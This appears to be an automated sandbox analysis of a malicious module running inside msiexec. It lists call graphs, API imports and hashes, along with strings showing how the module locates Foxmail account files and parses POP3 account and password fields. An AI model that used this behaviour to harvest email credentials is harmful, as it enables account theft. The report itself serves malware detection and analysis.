20 API calls 7438->7440 7441 21f59fd0 GetLastError 7439->7441 7442 21f59fac 7439->7442 7440->7442 7443 21f56332 __dosmaperr 20 API calls 7441->7443 7442->7340 7443->7442 7445 21f58d74 7444->7445 7446 21f58d5f 7444->7446 7448 21f56355 __dosmaperr 20 API calls 7445->7448 7450 21f58d99 7445->7450 7447 21f56355 __dosmaperr 20 API calls 7446->7447 7449 21f58d64 7447->7449 7451 21f58da4 7448->7451 7452 21f56368 _free 20 API calls 7449->7452 7450->7437 7453 21f56368 _free 20 API calls 7451->7453 7454 21f58d6c 7452->7454 7455 21f58dac 7453->7455 7454->7437 7456 21f562ac ___std_exception_copy 26 API calls 7455->7456 7456->7454 7458 21f58dd6 7457->7458 7459 21f58dc9 7457->7459 7461 21f58de2 7458->7461 7462 21f56368 _free 20 API calls 7458->7462 7460 21f56368 _free 20 API calls 7459->7460 7464 21f58dce 7460->7464 7461->7387 7463 21f58e03 7462->7463 7465 21f562ac ___std_exception_copy 26 API calls 7463->7465 7464->7387 7465->7464 7467 21f55af6 _abort 38 API calls 7466->7467 7468 21f57c24 7467->7468 7469 21f57a00 __fassign 38 API calls 7468->7469 7470 21f57c34 7469->7470 7470->7405 7471->7381 7475 21f5ad24 7472->7475 7474 21f5adca 7474->7297 7476 21f5ad30 ___DestructExceptionObject 7475->7476 7486 21f58c7b RtlEnterCriticalSection 7476->7486 7478 21f5ad3e 7479 21f5ad65 7478->7479 7480 21f5ad70 7478->7480 7487 21f5ae4d 7479->7487 7482 21f56368 _free 20 API calls 7480->7482 7483 21f5ad6b 7482->7483 7502 21f5ad9a 7483->7502 7485 21f5ad8d _abort 7485->7474 7486->7478 7488 21f58d52 26 API calls 7487->7488 7491 21f5ae5d 7488->7491 7489 21f5ae63 7505 21f58cc1 7489->7505 7491->7489 7492 21f5ae95 7491->7492 7495 21f58d52 26 API calls 7491->7495 7492->7489 7493 21f58d52 26 API calls 7492->7493 7496 21f5aea1 CloseHandle 7493->7496 7498 21f5ae8c 7495->7498 7496->7489 7500 21f5aead GetLastError 7496->7500 7497 21f5aedd 7497->7483 7499 21f58d52 26 API calls 7498->7499 7499->7492 7500->7489 7501 21f56332 __dosmaperr 20 API calls 7501->7497 7514 21f58c9e RtlLeaveCriticalSection 7502->7514 7504 21f5ada4 7504->7485 7506 21f58d37 7505->7506 7507 21f58cd0 7505->7507 7508 21f56368 _free 20 API calls 7506->7508 7507->7506 7511 21f58cfa 7507->7511 7509 21f58d3c 7508->7509 7510 21f56355 __dosmaperr 20 API calls 7509->7510 7512 21f58d27 7510->7512 7511->7512 7513 21f58d21 SetStdHandle 7511->7513 7512->7497 7512->7501 7513->7512 7514->7504 7515->7270 7516->7250 7517 21f55630 7520 21f5563b 7517->7520 7518 21f55eb7 11 API calls 7518->7520 7519 21f55664 7523 21f55688 7519->7523 7520->7518 7520->7519 7521 21f55660 7520->7521 7524 21f556b4 7523->7524 7525 21f55695 7523->7525 7524->7521 7526 21f5569f RtlDeleteCriticalSection 7525->7526 7526->7524 7526->7526 6847 21f53eb3 6850 21f55411 6847->6850 6851 21f5541d _abort 6850->6851 6852 21f55af6 _abort 38 API calls 6851->6852 6853 21f55422 6852->6853 6854 21f555a8 _abort 38 API calls 6853->6854 6855 21f5544c 6854->6855 7527 21f5543d 7528 21f55440 7527->7528 7529 21f555a8 _abort 38 API calls 7528->7529 7530 21f5544c 7529->7530 7531 21f51f3f 7532 21f51f4b ___DestructExceptionObject 7531->7532 7549 21f5247c 7532->7549 7534 21f51f52 7535 21f52041 7534->7535 7536 21f51f7c 7534->7536 7543 21f51f57 ___scrt_is_nonwritable_in_current_image 7534->7543 7538 21f52639 ___scrt_fastfail 4 API calls 7535->7538 7560 21f523de 7536->7560 7539 21f52048 7538->7539 7540 21f51f8b __RTC_Initialize 7540->7543 7563 21f522fc RtlInitializeSListHead 7540->7563 7542 21f51f99 ___scrt_initialize_default_local_stdio_options 7564 21f546c5 7542->7564 7547 21f51fb8 7547->7543 7548 21f54669 _abort 5 API calls 7547->7548 7548->7543 7550 21f52485 7549->7550 7572 21f52933 IsProcessorFeaturePresent 7550->7572 7554 21f52496 7559 21f5249a 7554->7559 7583 21f553c8 7554->7583 7557 21f524b1 7557->7534 7558 21f53529 ___vcrt_uninitialize 8 API calls 7558->7559 7559->7534 7614 21f524b5 7560->7614 7562 21f523e5 7562->7540 7563->7542 7567 21f546dc 7564->7567 7565 21f52ada _ValidateLocalCookies 5 API calls 7566 21f51fad 7565->7566 7566->7543 7568 21f523b3 7566->7568 7567->7565 7569 21f523b8 ___scrt_release_startup_lock 7568->7569 7570 21f52933 ___isa_available_init IsProcessorFeaturePresent 7569->7570 7571 21f523c1 7569->7571 7570->7571 7571->7547 7573 21f52491 7572->7573 7574 21f534ea 7573->7574 7575 21f534ef ___vcrt_initialize_winapi_thunks 7574->7575 7586 21f53936 7575->7586 7578 21f534fd 7578->7554 7580 21f53505 7581 21f53510 7580->7581 7582 21f53972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 7580->7582 7581->7554 7582->7578 7610 21f57457 7583->7610 7587 21f5393f 7586->7587 7589 21f53968 7587->7589 7590 21f534f9 7587->7590 7600 21f53be0 7587->7600 7591 21f53972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 7589->7591 7590->7578 7592 21f538e8 7590->7592 7591->7590 7605 21f53af1 7592->7605 7595 21f538fd 7595->7580 7596 21f53ba2 ___vcrt_FlsSetValue 6 API calls 7597 21f5390b 7596->7597 7598 21f53918 7597->7598 7599 21f5391b ___vcrt_uninitialize_ptd 6 API calls 7597->7599 7598->7580 7599->7595 7601 21f53a82 try_get_function 5 API calls 7600->7601 7602 21f53bfa 7601->7602 7603 21f53c18 InitializeCriticalSectionAndSpinCount 7602->7603 7604 21f53c03 7602->7604 7603->7604 7604->7587 7606 21f53a82 try_get_function 5 API calls 7605->7606 7607 21f53b0b 7606->7607 7608 21f53b24 TlsAlloc 7607->7608 7609 21f538f2 7607->7609 7609->7595 7609->7596 7613 21f57470 7610->7613 7611 21f52ada _ValidateLocalCookies 5 API calls 7612 21f524a3 7611->7612 7612->7557 7612->7558 7613->7611 7615 21f524c4 7614->7615 7616 21f524c8 7614->7616 7615->7562 7617 21f52639 ___scrt_fastfail 4 API calls 7616->7617 7619 21f524d5 ___scrt_release_startup_lock 7616->7619 7618 21f52559 7617->7618 7619->7562 6856 21f5c7a7 6857 21f5c7be 6856->6857 6862 21f5c80d 6856->6862 6857->6862 6865 21f5c7e6 GetModuleHandleA 6857->6865 6858 21f5c835 GetModuleHandleA 6858->6862 6859 21f5c872 6862->6858 6862->6859 6863 21f5c85f GetProcAddress 6862->6863 6863->6862 6866 21f5c7ef 6865->6866 6872 21f5c80d 6865->6872 6874 21f5c803 GetProcAddress 6866->6874 6868 21f5c835 GetModuleHandleA 6868->6872 6869 21f5c872 6872->6868 6872->6869 6873 21f5c85f GetProcAddress 6872->6873 6873->6872 6877 21f5c80d 6874->6877 6875 21f5c835 GetModuleHandleA 6875->6877 6876 21f5c872 6877->6875 6877->6876 6878 21f5c85f GetProcAddress 6877->6878 6878->6877 6879 21f521a1 ___scrt_dllmain_exception_filter 6880 21f560ac 6882 21f560b7 6880->6882 6883 21f560dd 6880->6883 6881 21f560c7 FreeLibrary 6881->6882 6882->6881 6882->6883 7620 21f5742b 7621 21f57430 7620->7621 7623 21f57453 7621->7623 7624 21f58bae 7621->7624 7625 21f58bdd 7624->7625 7626 21f58bbb 7624->7626 7625->7621 7627 21f58bd7 7626->7627 7628 21f58bc9 RtlDeleteCriticalSection 7626->7628 7629 21f5571e _free 20 API calls 7627->7629 7628->7627 7628->7628 7629->7625 6884 21f53c90 RtlUnwind 7630 21f5281c 7631 21f52882 std::exception::exception 27 API calls 7630->7631 7632 21f5282a 7631->7632 7633 21f52418 7634 21f52420 ___scrt_release_startup_lock 7633->7634 7637 21f547f5 7634->7637 7636 21f52448 7638 21f54804 7637->7638 7639 21f54808 7637->7639 7638->7636 7642 21f54815 7639->7642 7643 21f55b7a __dosmaperr 20 API calls 7642->7643 7646 21f5482c 7643->7646 7644 21f52ada _ValidateLocalCookies 5 API calls 7645 21f54811 7644->7645 7645->7636 7646->7644 6885 21f5679a 6886 21f567a4 6885->6886 6887 21f567b4 6886->6887 6888 21f5571e _free 20 API calls 6886->6888 6889 21f5571e _free 20 API calls 6887->6889 6888->6886 6890 21f567bb 6889->6890 6891 21f54a9a 6892 21f55411 38 API calls 6891->6892 6893 21f54aa2 6892->6893 6894 21f57a80 6895 21f57a8d 6894->6895 6896 21f5637b __dosmaperr 20 API calls 6895->6896 6897 21f57aa7 6896->6897 6898 21f5571e _free 20 API calls 6897->6898 6899 21f57ab3 6898->6899 6900 21f5637b __dosmaperr 20 API calls 6899->6900 6904 21f57ad9 6899->6904 6901 21f57acd 6900->6901 6903 21f5571e _free 20 API calls 6901->6903 6902 21f55eb7 11 API calls 6902->6904 6903->6904 6904->6902 6905 21f57ae5 6904->6905 7647 21f57103 GetCommandLineA GetCommandLineW 7648 21f55303 7651 21f550a5 7648->7651 7660 21f5502f 7651->7660 7654 21f5502f 5 API calls 7655 21f550c3 7654->7655 7656 21f55000 20 API calls 7655->7656 7657 21f550ce 7656->7657 7658 21f55000 20 API calls 7657->7658 7659 21f550d9 7658->7659 7661 21f55048 7660->7661 7662 21f52ada _ValidateLocalCookies 5 API calls 7661->7662 7663 21f55069 7662->7663 7663->7654 7664 21f5220c 7665 21f52215 7664->7665 7666 21f5221a dllmain_dispatch 7664->7666 7668 21f522b1 7665->7668 7669 21f522c7 7668->7669 7671 21f522d0 7669->7671 7672 21f52264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 7669->7672 7671->7666 7672->7671 6906 21f58a89 6907 21f56d60 51 API calls 6906->6907 6908 21f58a8e 6907->6908

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 21F51137
                                                                                                                                                      • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 21F51151
                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 21F5115C
                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 21F5116D
                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 21F5117C
                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 21F51193
                                                                                                                                                      • FindNextFileW.KERNELBASE(00000000,00000010), ref: 21F511D0
                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 21F511DB
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.3056212211.0000000021F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 21F50000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.3056185934.0000000021F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000009.00000002.3056212211.0000000021F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_9_2_21f50000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1083526818-0
                                                                                                                                                      • Opcode ID: 3c2f02473ae61ad3de09907fafa552d669d039406a1381a398cc1bbd9f76e192
                                                                                                                                                      • Instruction ID: 6128bed83fcfcb36a37bc1ad4cc2b7ac0d22468c32c8b95325cdf64c142ddefd
                                                                                                                                                      • Opcode Fuzzy Hash: 3c2f02473ae61ad3de09907fafa552d669d039406a1381a398cc1bbd9f76e192
                                                                                                                                                      • Instruction Fuzzy Hash: 0F219372544309BBD714EAA49C4CF9B7BDCEF84354F000A2AF968D3190E735D6458796

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 21F51434
                                                                                                                                                        • Part of subcall function 21F510F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 21F51137
                                                                                                                                                        • Part of subcall function 21F510F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 21F51151
                                                                                                                                                        • Part of subcall function 21F510F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 21F5115C
                                                                                                                                                        • Part of subcall function 21F510F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 21F5116D
                                                                                                                                                        • Part of subcall function 21F510F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 21F5117C
                                                                                                                                                        • Part of subcall function 21F510F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 21F51193
                                                                                                                                                        • Part of subcall function 21F510F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 21F511D0
                                                                                                                                                        • Part of subcall function 21F510F1: FindClose.KERNEL32(00000000), ref: 21F511DB
                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 21F514C5
                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 21F514E0
                                                                                                                                                      • lstrlenW.KERNEL32(?,?), ref: 21F5150F
                                                                                                                                                      • lstrcatW.KERNEL32(00000000), ref: 21F51521
                                                                                                                                                      • lstrlenW.KERNEL32(?,?), ref: 21F51547
                                                                                                                                                      • lstrcatW.KERNEL32(00000000), ref: 21F51553
                                                                                                                                                      • lstrlenW.KERNEL32(?,?), ref: 21F51579
                                                                                                                                                      • lstrcatW.KERNEL32(00000000), ref: 21F51585
                                                                                                                                                      • lstrlenW.KERNEL32(?,?), ref: 21F515AB
                                                                                                                                                      • lstrcatW.KERNEL32(00000000), ref: 21F515B7
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.3056212211.0000000021F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 21F50000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.3056185934.0000000021F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000009.00000002.3056212211.0000000021F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_9_2_21f50000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                                                                      • String ID: )$Foxmail$ProgramFiles
                                                                                                                                                      • API String ID: 672098462-2938083778
                                                                                                                                                      • Opcode ID: a9a1d94097eba33d67a7c9fa33bcbb20a3ac8e16738076e22c81e27e63488ec6
                                                                                                                                                      • Instruction ID: 1acaf8d2038f8ab501bfe5e49afc44899971ca7926f9d4459479f43bd262fccd
                                                                                                                                                      • Opcode Fuzzy Hash: a9a1d94097eba33d67a7c9fa33bcbb20a3ac8e16738076e22c81e27e63488ec6
                                                                                                                                                      • Instruction Fuzzy Hash: 1881D171A44358B9DB20DBA1DC85FEE737EEF84710F000596F518E7190EA726A84CF94
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 21F51E89: lstrlenW.KERNEL32(?,?,?,?,?,21F510DF,?,?,?,00000000), ref: 21F51E9A
                                                                                                                                                        • Part of subcall function 21F51E89: lstrcatW.KERNEL32(?,?,?,21F510DF,?,?,?,00000000), ref: 21F51EAC
                                                                                                                                                        • Part of subcall function 21F51E89: lstrlenW.KERNEL32(?,?,21F510DF,?,?,?,00000000), ref: 21F51EB3
                                                                                                                                                        • Part of subcall function 21F51E89: lstrlenW.KERNEL32(?,?,21F510DF,?,?,?,00000000), ref: 21F51EC8
                                                                                                                                                        • Part of subcall function 21F51E89: lstrcatW.KERNEL32(?,21F510DF,?,21F510DF,?,?,?,00000000), ref: 21F51ED3
                                                                                                                                                      • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 21F5122A
                                                                                                                                                        • Part of subcall function 21F5173A: _strlen.LIBCMT ref: 21F51855
                                                                                                                                                        • Part of subcall function 21F5173A: _strlen.LIBCMT ref: 21F51869
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.3056212211.0000000021F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 21F50000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.3056185934.0000000021F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000009.00000002.3056212211.0000000021F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_9_2_21f50000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                                                                                      • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                                                                      • API String ID: 4036392271-1520055953
                                                                                                                                                      • Opcode ID: c000862cdf6d918343e41e029c4327a2156c428392cd866d531384ba5f9481ee
                                                                                                                                                      • Instruction ID: 2f1c2a85f983f6d812417925c338bd21175e50cd96f7ced5f48dceb08049a67e
                                                                                                                                                      • Opcode Fuzzy Hash: c000862cdf6d918343e41e029c4327a2156c428392cd866d531384ba5f9481ee
                                                                                                                                                      • Instruction Fuzzy Hash: 7521D779E146487AEB1497D0EC81FED733AEF80714F000546F614EB1D0E6B22D80C758
                                                                                                                                                      APIs
                                                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 21F561DA
                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 21F561E4
                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 21F561F1
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.3056212211.0000000021F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 21F50000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.3056185934.0000000021F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000009.00000002.3056212211.0000000021F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_9_2_21f50000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3906539128-0
                                                                                                                                                      • Opcode ID: 5f4c7beec7c63fd68316a3096112d747469f6ffb129401a6dcb85b7637951d15
                                                                                                                                                      • Instruction ID: c29d6bd2f89e34b1a3cc78361b95fa312afd93b9962c3e0448d2e6bf43e0ebc1
                                                                                                                                                      • Opcode Fuzzy Hash: 5f4c7beec7c63fd68316a3096112d747469f6ffb129401a6dcb85b7637951d15
                                                                                                                                                      • Instruction Fuzzy Hash: D931F57594121CEBCB65DF64D88878DBBB4EF08320F1042DAE82CA7250E7359B818F44
                                                                                                                                                      APIs
                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,?,21F54A8A,?,21F62238,0000000C,21F54BBD,00000000,00000000,?,21F52082,21F62108,0000000C,21F51F3A,?), ref: 21F54AD5
                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,?,21F54A8A,?,21F62238,0000000C,21F54BBD,00000000,00000000,?,21F52082,21F62108,0000000C,21F51F3A,?), ref: 21F54ADC
                                                                                                                                                      • ExitProcess.KERNEL32 ref: 21F54AEE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.3056212211.0000000021F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 21F50000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.3056185934.0000000021F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000009.00000002.3056212211.0000000021F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_9_2_21f50000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1703294689-0
                                                                                                                                                      • Opcode ID: 004a625c9e9d6233f5f115401c5579f08ab14c374477753f637b9e271e0677cc
                                                                                                                                                      • Instruction ID: d0cbc64a1004acd80f3f6d4c1d728722481aae552288f6c0d42db1c8b01e2cc3
                                                                                                                                                      • Opcode Fuzzy Hash: 004a625c9e9d6233f5f115401c5579f08ab14c374477753f637b9e271e0677cc
                                                                                                                                                      • Instruction Fuzzy Hash: D8E0B636041209FFCF8A6F68CD08A493F6AFF41391B504014FA299B125EB3BD952CB94
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.3056212211.0000000021F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 21F50000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.3056185934.0000000021F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000009.00000002.3056212211.0000000021F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_9_2_21f50000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: HeapProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 54951025-0
                                                                                                                                                      • Opcode ID: 683fce4ad366fe611123a129060bb58b0a4d1721366c36ec52b8028ddbe779fd
                                                                                                                                                      • Instruction ID: 9ca13ad494a9a57b7fab70dc47a2f798e93ae8b15807432fcccb0d622f163f67
                                                                                                                                                      • Opcode Fuzzy Hash: 683fce4ad366fe611123a129060bb58b0a4d1721366c36ec52b8028ddbe779fd
                                                                                                                                                      • Instruction Fuzzy Hash: 12A011302822038F83888E38820A20E3AACAA002C0B000028A83CC00ACEB2880028B00

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 21F51CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 21F51D1B
                                                                                                                                                        • Part of subcall function 21F51CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 21F51D37
                                                                                                                                                        • Part of subcall function 21F51CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21F51D4B
                                                                                                                                                      • _strlen.LIBCMT ref: 21F51855
                                                                                                                                                      • _strlen.LIBCMT ref: 21F51869
                                                                                                                                                      • _strlen.LIBCMT ref: 21F5188B
                                                                                                                                                      • _strlen.LIBCMT ref: 21F518AE
                                                                                                                                                      • _strlen.LIBCMT ref: 21F518C8
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.3056212211.0000000021F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 21F50000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.3056185934.0000000021F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000009.00000002.3056212211.0000000021F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_9_2_21f50000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _strlen$File$CopyCreateDelete
                                                                                                                                                      • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                                                                                      • API String ID: 3296212668-3023110444
                                                                                                                                                      • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                                                      • Instruction ID: c43f07d2fa79f68dd35bf830b7922fb628f47f38c331ba3431ae031be08bd6ae
                                                                                                                                                      • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                                                      • Instruction Fuzzy Hash: 73613471D08219BFEF59CBA4C840BDEBBBBAF46304F00415AD225B7241EB726A45CF52

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.3056212211.0000000021F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 21F50000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.3056185934.0000000021F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000009.00000002.3056212211.0000000021F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_9_2_21f50000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _strlen
                                                                                                                                                      • String ID: %m$~$Gon~$~F@7$~dra
                                                                                                                                                      • API String ID: 4218353326-230879103
                                                                                                                                                      • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                                                      • Instruction ID: c04e7b7e4f0e7960293cebe52957fbd68dcc2fb1d3ccedabadf8d7496bd27036
                                                                                                                                                      • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                                                      • Instruction Fuzzy Hash: 3A715B71C04629BFDF159BB08884AEF7FFD9F05300F10009AD954E3242E636A785CBA0

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 203 21f57cc2-21f57cd6 204 21f57d44-21f57d4c 203->204 205 21f57cd8-21f57cdd 203->205 206 21f57d93-21f57dab call 21f57e35 204->206 207 21f57d4e-21f57d51 204->207 205->204 208 21f57cdf-21f57ce4 205->208 215 21f57dae-21f57db5 206->215 207->206 209 21f57d53-21f57d90 call 21f5571e * 4 207->209 208->204 211 21f57ce6-21f57ce9 208->211 209->206 211->204 213 21f57ceb-21f57cf3 211->213 216 21f57cf5-21f57cf8 213->216 217 21f57d0d-21f57d15 213->217 219 21f57dd4-21f57dd8 215->219 220 21f57db7-21f57dbb 215->220 216->217 221 21f57cfa-21f57d0c call 21f5571e call 21f590ba 216->221 222 21f57d17-21f57d1a 217->222 223 21f57d2f-21f57d43 call 21f5571e * 2 217->223 230 21f57df0-21f57dfc 219->230 231 21f57dda-21f57ddf 219->231 225 21f57dd1 220->225 226 21f57dbd-21f57dc0 220->226 221->217 222->223 228 21f57d1c-21f57d2e call 21f5571e call 21f591b8 222->228 223->204 225->219 226->225 235 21f57dc2-21f57dd0 call 21f5571e * 2 226->235 228->223 230->215 234 21f57dfe-21f57e0b call 21f5571e 230->234 239 21f57de1-21f57de4 231->239 240 21f57ded 231->240 235->225 239->240 247 21f57de6-21f57dec call 21f5571e 239->247 240->230 247->240
                                                                                                                                                      APIs
                                                                                                                                                      • ___free_lconv_mon.LIBCMT ref: 21F57D06
                                                                                                                                                        • Part of subcall function 21F590BA: _free.LIBCMT ref: 21F590D7
                                                                                                                                                        • Part of subcall function 21F590BA: _free.LIBCMT ref: 21F590E9
                                                                                                                                                        • Part of subcall function 21F590BA: _free.LIBCMT ref: 21F590FB
                                                                                                                                                        • Part of subcall function 21F590BA: _free.LIBCMT ref: 21F5910D
                                                                                                                                                        • Part of subcall function 21F590BA: _free.LIBCMT ref: 21F5911F
                                                                                                                                                        • Part of subcall function 21F590BA: _free.LIBCMT ref: 21F59131
                                                                                                                                                        • Part of subcall function 21F590BA: _free.LIBCMT ref: 21F59143
                                                                                                                                                        • Part of subcall function 21F590BA: _free.LIBCMT ref: 21F59155
                                                                                                                                                        • Part of subcall function 21F590BA: _free.LIBCMT ref: 21F59167
                                                                                                                                                        • Part of subcall function 21F590BA: _free.LIBCMT ref: 21F59179
                                                                                                                                                        • Part of subcall function 21F590BA: _free.LIBCMT ref: 21F5918B
                                                                                                                                                        • Part of subcall function 21F590BA: _free.LIBCMT ref: 21F5919D
                                                                                                                                                        • Part of subcall function 21F590BA: _free.LIBCMT ref: 21F591AF
                                                                                                                                                      • _free.LIBCMT ref: 21F57CFB
                                                                                                                                                        • Part of subcall function 21F5571E: HeapFree.KERNEL32(00000000,00000000,?,21F5924F,?,00000000,?,00000000,?,21F59276,?,00000007,?,?,21F57E5A,?), ref: 21F55734
                                                                                                                                                        • Part of subcall function 21F5571E: GetLastError.KERNEL32(?,?,21F5924F,?,00000000,?,00000000,?,21F59276,?,00000007,?,?,21F57E5A,?,?), ref: 21F55746
                                                                                                                                                      • _free.LIBCMT ref: 21F57D1D
                                                                                                                                                      • _free.LIBCMT ref: 21F57D32
                                                                                                                                                      • _free.LIBCMT ref: 21F57D3D
                                                                                                                                                      • _free.LIBCMT ref: 21F57D5F
                                                                                                                                                      • _free.LIBCMT ref: 21F57D72
                                                                                                                                                      • _free.LIBCMT ref: 21F57D80
                                                                                                                                                      • _free.LIBCMT ref: 21F57D8B
                                                                                                                                                      • _free.LIBCMT ref: 21F57DC3
                                                                                                                                                      • _free.LIBCMT ref: 21F57DCA
